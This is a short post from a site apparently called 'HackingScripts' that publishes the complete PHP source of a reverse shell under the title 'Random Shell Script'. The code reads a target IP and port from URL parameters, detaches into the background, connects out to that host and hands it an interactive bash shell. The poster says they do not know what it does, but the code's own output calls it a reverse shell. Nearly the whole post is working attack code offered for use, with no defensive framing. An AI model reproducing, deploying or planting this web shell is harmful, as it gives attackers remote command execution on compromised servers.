HackingScripts

Hack Scripts for everybody

Random Shell Script

25 Jan 2014

A random shell script.. I don’t know what this one does, or find any information on it. I don’t even know what it’s called! Anyway, it is very nicely written and commented.

Random Shell Script Source Code

  1 <?php
  2 set_time_limit (0);
  3 $VERSION = "1.0";
  4 $ip = $_GET["ip"]; 
  5 $port = $_GET["port"]; 
  6 $chunk_size = 1400;
  7 $write_a = null;
  8 $error_a = null;
  9 $shell = '/bin/bash -p -i';
 10 $daemon = 0;
 11 $debug = 0;
 12  
 13 if (function_exists('pcntl_fork')) {
 14     // Fork and have the parent process exit
 15     $pid = pcntl_fork();
 16  
 17     if ($pid == -1) {
 18         printit("ERROR: Can't fork");
 19         exit(1);
 20     }
 21  
 22     if ($pid) {
 23         exit(0);  // Parent exits
 24     }
 25  
 26     // Make the current process a session leader
 27     // Will only succeed if we forked
 28     if (posix_setsid() == -1) {
 29         printit("Error: Can't setsid()");
 30         exit(1);
 31     }
 32  
 33     $daemon = 1;
 34 } else {
 35     printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
 36 }
 37  
 38 // Change to a safe directory
 39 chdir("/");
 40  
 41 // Remove any umask we inherited
 42 umask(0);
 43  
 44 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
 45 if (!$sock) {
 46     printit("$errstr ($errno)");
 47     exit(1);
 48 }
 49  
 50 // Spawn shell process
 51 $descriptorspec = array(
 52    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
 53    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
 54    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
 55 );
 56  
 57 $process = proc_open($shell, $descriptorspec, $pipes);
 58  
 59 if (!is_resource($process)) {
 60     printit("ERROR: Can't spawn shell");
 61     exit(1);
 62 }
 63  
 64 // Set everything to non-blocking
 65 // Reason: Occsionally reads will block, even though stream_select tells us they won't
 66 stream_set_blocking($pipes[0], 0);
 67 stream_set_blocking($pipes[1], 0);
 68 stream_set_blocking($pipes[2], 0);
 69 stream_set_blocking($sock, 0);
 70  
 71 printit("Successfully opened reverse shell to $ip:$port");
 72  
 73 while (1) {
 74     // Check for end of TCP connection
 75     if (feof($sock)) {
 76         printit("ERROR: Shell connection terminated");
 77         break;
 78     }
 79  
 80     // Check for end of STDOUT
 81     if (feof($pipes[1])) {
 82         printit("ERROR: Shell process terminated");
 83         break;
 84     }
 85  
 86     // Wait until a command is end down $sock, or some
 87     // command output is available on STDOUT or STDERR
 88     $read_a = array($sock, $pipes[1], $pipes[2]);
 89     $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
 90  
 91     // If we can read from the TCP socket, send
 92     // data to process's STDIN
 93     if (in_array($sock, $read_a)) {
 94         if ($debug) printit("SOCK READ");
 95         $input = fread($sock, $chunk_size);
 96         if ($debug) printit("SOCK: $input");
 97         fwrite($pipes[0], $input);
 98     }
 99  
100     // If we can read from the process's STDOUT
101     // send data down tcp connection
102     if (in_array($pipes[1], $read_a)) {
103         if ($debug) printit("STDOUT READ");
104         $input = fread($pipes[1], $chunk_size);
105         if ($debug) printit("STDOUT: $input");
106         fwrite($sock, $input);
107     }
108  
109     // If we can read from the process's STDERR
110     // send data down tcp connection
111     if (in_array($pipes[2], $read_a)) {
112         if ($debug) printit("STDERR READ");
113         $input = fread($pipes[2], $chunk_size);
114         if ($debug) printit("STDERR: $input");
115         fwrite($sock, $input);
116     }
117 }
118  
119 fclose($sock);
120 fclose($pipes[0]);
121 fclose($pipes[1]);
122 fclose($pipes[2]);
123 proc_close($process);
124  
125 // Like print, but does nothing if we've daemonised ourself
126 // (I can't figure out how to redirect STDOUT like a proper daemon)
127 function printit ($string) {
128     if (!$daemon) {
129         print "$string\n";
130     }
131 }
132 ?>